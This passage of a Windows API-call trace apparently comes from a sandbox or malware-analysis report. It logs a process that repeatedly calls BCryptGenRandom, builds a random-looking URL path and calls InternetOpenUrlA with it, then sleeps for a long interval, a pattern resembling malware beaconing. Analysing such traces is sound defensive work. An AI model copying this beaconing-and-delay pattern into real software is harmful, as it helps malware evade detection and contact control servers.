(in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.481] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.482] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.482] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.482] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.482] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.482] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.483] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.483] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.483] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.483] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.483] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.483] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.484] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.484] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.484] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0226.484] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17872, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a17872) returned 0x0 [0226.484] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.485] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.485] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.485] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.485] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.485] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.485] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.486] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.486] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.486] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.486] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.486] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0226.486] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.487] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.487] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.487] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.487] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.487] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.487] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0226.488] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.488] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.488] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.488] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.488] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.488] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.489] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.489] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.489] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.489] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.490] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.490] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.490] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.490] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.490] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.490] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.491] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.491] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.491] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.491] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0226.491] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1789f, cbBuffer=0x1c, dwFlags=0x2 | out: pbBuffer=0x3a1789f) returned 0x0 [0226.492] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.492] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0226.492] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.492] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.492] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.492] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.492] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.492] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.493] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.493] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.493] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.493] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.494] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.494] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.494] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.494] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.495] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.495] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.495] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.495] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.496] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.496] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.496] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.496] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.496] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.496] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.496] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.496] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.496] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.496] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0226.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.497] GetProcessHeap () returned 0x440000 [0226.497] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473b90 [0226.497] lstrcpyA (in: lpString1=0x473b90, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0226.497] lstrcatA (in: lpString1="\x81\x03", lpString2="/h1ezjopHkbY6ljfermRxEbs5gqqvdmfspbgkJjepoonRnbXi/1xq8jc38gljLe1uJb0y2fFu1eQkz8p98xf4tbj7ab4pI/Dl2gqz2gfqvqM5bolmdfZEvr32d/" | out: lpString1="\x81\x03/h1ezjopHkbY6ljfermRxEbs5gqqvdmfspbgkJjepoonRnbXi/1xq8jc38gljLe1uJb0y2fFu1eQkz8p98xf4tbj7ab4pI/Dl2gqz2gfqvqM5bolmdfZEvr32d/") returned="\x81\x03/h1ezjopHkbY6ljfermRxEbs5gqqvdmfspbgkJjepoonRnbXi/1xq8jc38gljLe1uJb0y2fFu1eQkz8p98xf4tbj7ab4pI/Dl2gqz2gfqvqM5bolmdfZEvr32d/" [0226.498] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0226.498] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/h1ezjopHkbY6ljfermRxEbs5gqqvdmfspbgkJjepoonRnbXi/1xq8jc38gljLe1uJb0y2fFu1eQkz8p98xf4tbj7ab4pI/Dl2gqz2gfqvqM5bolmdfZEvr32d/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0226.498] GetProcessHeap () returned 0x440000 [0226.498] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473b90 | out: hHeap=0x440000) returned 1 [0226.498] GetProcessHeap () returned 0x440000 [0226.498] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17840 | out: hHeap=0x440000) returned 1 [0226.499] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0226.499] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0226.500] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0226.500] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0226.500] Sleep (dwMilliseconds=0x1b5e2) [0226.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0226.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0226.729] GetProcessHeap () returned 0x440000 [0226.729] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16f80 [0226.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0226.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16f81, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a16f81) returned 0x0 [0226.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0226.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0226.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 